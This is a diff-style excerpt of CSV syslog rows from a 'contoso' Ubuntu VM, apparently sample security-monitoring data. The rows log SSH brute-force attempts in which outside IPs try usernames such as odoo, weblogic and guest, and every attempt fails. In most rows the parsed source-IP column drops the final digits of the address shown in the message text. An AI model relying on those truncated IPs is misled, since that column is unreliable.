+10806,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:24,UbuntuDevEnv,2019-06-26 00:01:24,auth,UbuntuDevEnv,info,Disconnected from invalid user odoo 131.100.219.3 port 54908 [preauth],66689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,odoo,131.100.219.3,54908,,
+10807,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:24,UbuntuDevEnv,2019-06-26 00:01:24,auth,UbuntuDevEnv,info,Invalid user minecraftserver from 196.27.127.61 port 44281,66703,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraftserver,196.27.127.6,44281,,
+10808,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:24,UbuntuDevEnv,2019-06-26 00:01:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66703,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10809,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:24,UbuntuDevEnv,2019-06-26 00:01:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,66703,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+10810,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:24,UbuntuDevEnv,2019-06-26 00:01:24,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 40918:11: Bye Bye [preauth],66697,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,40918,,
+10811,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:24,UbuntuDevEnv,2019-06-26 00:01:24,auth,UbuntuDevEnv,info,Disconnected from invalid user amministratore 114.112.81.180 port 40918 [preauth],66697,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amministratore,114.112.81.1,40918,,
+10812,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:27,UbuntuDevEnv,2019-06-26 00:01:26,auth,UbuntuDevEnv,info,Failed password for invalid user minecraftserver from 196.27.127.61 port 44281 ssh2,66703,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraftserver,196.27.127.6,44281,,
+10813,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:27,UbuntuDevEnv,2019-06-26 00:01:26,auth,UbuntuDevEnv,info,Disconnected from invalid user minecraftserver 196.27.127.61 port 44281 [preauth],66703,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minecraftserver,196.27.127.6,44281,,
+10814,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:27,UbuntuDevEnv,2019-06-26 00:01:26,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 44281:11: Bye Bye [preauth],66703,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,44281,,
+10815,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:27,UbuntuDevEnv,2019-06-26 00:01:27,auth,UbuntuDevEnv,info,Invalid user lara from 88.247.110.88 port 27332,66716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lara,88.247.110.8,27332,,
+10816,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:27,UbuntuDevEnv,2019-06-26 00:01:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10817,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:27,UbuntuDevEnv,2019-06-26 00:01:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,66716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+10818,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:29,UbuntuDevEnv,2019-06-26 00:01:28,auth,UbuntuDevEnv,info,Failed password for invalid user lara from 88.247.110.88 port 27332 ssh2,66716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lara,88.247.110.8,27332,,
+10819,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:29,UbuntuDevEnv,2019-06-26 00:01:28,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 27332:11: Bye Bye [preauth],66716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,27332,,
+10820,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:29,UbuntuDevEnv,2019-06-26 00:01:28,auth,UbuntuDevEnv,info,Disconnected from invalid user lara 88.247.110.88 port 27332 [preauth],66716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lara,88.247.110.8,27332,,
+10821,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:02:15,UbuntuDevEnv,2019-06-26 00:02:14,auth,UbuntuDevEnv,info,Invalid user niu from 138.68.12.43 port 49316,66883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,niu,138.68.12.4,49316,,
+10822,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:02:15,UbuntuDevEnv,2019-06-26 00:02:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10823,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:02:15,UbuntuDevEnv,2019-06-26 00:02:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,66883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10824,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:02:17,UbuntuDevEnv,2019-06-26 00:02:16,auth,UbuntuDevEnv,info,Failed password for invalid user niu from 138.68.12.43 port 49316 ssh2,66883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,niu,138.68.12.4,49316,,
+10825,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:02:17,UbuntuDevEnv,2019-06-26 00:02:17,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 49316:11: Bye Bye [preauth],66883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,49316,,
+10826,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:02:17,UbuntuDevEnv,2019-06-26 00:02:17,auth,UbuntuDevEnv,info,Disconnected from invalid user niu 138.68.12.43 port 49316 [preauth],66883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,niu,138.68.12.4,49316,,
+10827,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:02:18,UbuntuDevEnv,2019-06-26 00:02:17,auth,UbuntuDevEnv,info,Invalid user zxcloudsetup from 118.222.146.186 port 51894,66896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zxcloudsetup,118.222.146.1,51894,,
+10828,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:02:18,UbuntuDevEnv,2019-06-26 00:02:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10829,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:02:18,UbuntuDevEnv,2019-06-26 00:02:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,66896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+10830,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:02:20,UbuntuDevEnv,2019-06-26 00:02:19,auth,UbuntuDevEnv,info,Failed password for invalid user zxcloudsetup from 118.222.146.186 port 51894 ssh2,66896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zxcloudsetup,118.222.146.1,51894,,
+10831,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:02:20,UbuntuDevEnv,2019-06-26 00:02:20,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 51894:11: Bye Bye [preauth],66896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,51894,,
+10832,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:02:20,UbuntuDevEnv,2019-06-26 00:02:20,auth,UbuntuDevEnv,info,Disconnected from invalid user zxcloudsetup 118.222.146.186 port 51894 [preauth],66896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zxcloudsetup,118.222.146.1,51894,,
+10833,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:08,UbuntuDevEnv,2019-06-26 00:03:07,auth,UbuntuDevEnv,info,Invalid user git from 114.112.81.180 port 59940,67074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,114.112.81.1,59940,,
+10834,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:08,UbuntuDevEnv,2019-06-26 00:03:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10835,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:03:08,UbuntuDevEnv,2019-06-26 00:03:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,67074,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+10836,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:09:47,UbuntuDevEnv,2019-06-26 00:09:46,auth,UbuntuDevEnv,info,Invalid user analytics from 104.248.121.67 port 58315,68518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,analytics,104.248.121.6,58315,,
+10837,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:09:47,UbuntuDevEnv,2019-06-26 00:09:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10838,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:09:47,UbuntuDevEnv,2019-06-26 00:09:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,68518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+10839,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:09:49,UbuntuDevEnv,2019-06-26 00:09:48,auth,UbuntuDevEnv,info,Failed password for invalid user analytics from 104.248.121.67 port 58315 ssh2,68518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,analytics,104.248.121.6,58315,,
+10840,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:09:49,UbuntuDevEnv,2019-06-26 00:09:48,auth,UbuntuDevEnv,info,Disconnected from invalid user analytics 104.248.121.67 port 58315 [preauth],68518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,analytics,104.248.121.6,58315,,
+10841,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:09:49,UbuntuDevEnv,2019-06-26 00:09:48,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 58315:11: Bye Bye [preauth],68518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,58315,,
+10842,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:07,UbuntuDevEnv,2019-06-26 00:10:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,68592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+10843,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:07,UbuntuDevEnv,2019-06-26 00:10:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10844,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:07,UbuntuDevEnv,2019-06-26 00:10:06,auth,UbuntuDevEnv,info,Invalid user col from 114.112.81.180 port 51304,68592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,col,114.112.81.1,51304,,
+10845,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:09,UbuntuDevEnv,2019-06-26 00:10:09,auth,UbuntuDevEnv,info,Failed password for invalid user col from 114.112.81.180 port 51304 ssh2,68592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,col,114.112.81.1,51304,,
+10846,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:09,UbuntuDevEnv,2019-06-26 00:10:09,auth,UbuntuDevEnv,info,Disconnected from invalid user col 114.112.81.180 port 51304 [preauth],68592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,col,114.112.81.1,51304,,
+10847,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:09,UbuntuDevEnv,2019-06-26 00:10:09,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 51304:11: Bye Bye [preauth],68592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,51304,,
+10848,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:11,UbuntuDevEnv,2019-06-26 00:10:11,auth,UbuntuDevEnv,info,Invalid user infortec from 88.247.110.88 port 20032,68611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,infortec,88.247.110.8,20032,,
+10849,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:11,UbuntuDevEnv,2019-06-26 00:10:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,68611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+10850,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:11,UbuntuDevEnv,2019-06-26 00:10:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10851,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:13,UbuntuDevEnv,2019-06-26 00:10:13,auth,UbuntuDevEnv,info,Failed password for invalid user infortec from 88.247.110.88 port 20032 ssh2,68611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,infortec,88.247.110.8,20032,,
+10852,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:13,UbuntuDevEnv,2019-06-26 00:10:13,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 20032:11: Bye Bye [preauth],68611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,20032,,
+10853,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:13,UbuntuDevEnv,2019-06-26 00:10:13,auth,UbuntuDevEnv,info,Disconnected from invalid user infortec 88.247.110.88 port 20032 [preauth],68611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,infortec,88.247.110.8,20032,,
+10854,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:38,UbuntuDevEnv,2019-06-26 00:10:38,auth,UbuntuDevEnv,info,Invalid user weblogic from 131.100.219.3 port 35818,68702,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,131.100.219.3,35818,,
+10855,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:38,UbuntuDevEnv,2019-06-26 00:10:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68702,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10856,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:38,UbuntuDevEnv,2019-06-26 00:10:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,68702,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+10857,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:40,UbuntuDevEnv,2019-06-26 00:10:40,auth,UbuntuDevEnv,info,Invalid user guest from 186.31.116.78 port 59953,68714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,186.31.116.7,59953,,
+10858,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:40,UbuntuDevEnv,2019-06-26 00:10:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10859,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:40,UbuntuDevEnv,2019-06-26 00:10:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=186.31.116.78,68714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,186.31.116.7,,0,
+10860,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:40,UbuntuDevEnv,2019-06-26 00:10:40,auth,UbuntuDevEnv,info,Failed password for invalid user weblogic from 131.100.219.3 port 35818 ssh2,68702,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,131.100.219.3,35818,,
+10861,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:41,UbuntuDevEnv,2019-06-26 00:10:40,auth,UbuntuDevEnv,info,Disconnected from invalid user weblogic 131.100.219.3 port 35818 [preauth],68702,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,131.100.219.3,35818,,
+10862,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:41,UbuntuDevEnv,2019-06-26 00:10:40,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 35818:11: Bye Bye [preauth],68702,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,35818,,
+10863,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:42,UbuntuDevEnv,2019-06-26 00:10:42,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 186.31.116.78 port 59953 ssh2,68714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,186.31.116.7,59953,,
+10864,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:42,UbuntuDevEnv,2019-06-26 00:10:42,auth,UbuntuDevEnv,info,Disconnected from invalid user guest 186.31.116.78 port 59953 [preauth],68714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,186.31.116.7,59953,,
+10865,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:10:42,UbuntuDevEnv,2019-06-26 00:10:42,auth,UbuntuDevEnv,info,Received disconnect from 186.31.116.78 port 59953:11: Bye Bye [preauth],68714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,186.31.116.7,59953,,
